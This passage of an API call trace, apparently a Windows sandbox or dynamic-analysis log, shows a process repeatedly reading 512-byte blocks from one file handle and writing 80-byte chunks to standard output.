lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 
| out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] GetFileType (hFile=0x4c) returned 0x1 [0111.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.852] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.852] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.852] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.852] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.853] GetFileType (hFile=0x4c) returned 0x1 [0111.853] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.853] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.853] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.853] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 
[0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] GetFileType (hFile=0x4c) returned 0x1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.854] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.854] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.854] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, 
lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.855] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.855] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.855] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType 
(hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.856] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.856] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.856] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.856] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, 
lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] GetFileType (hFile=0x4c) returned 0x1 [0111.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.857] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.857] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.857] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.858] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: 
hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] GetFileType (hFile=0x4c) returned 0x1 [0111.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.858] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.858] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.858] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.859] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle 
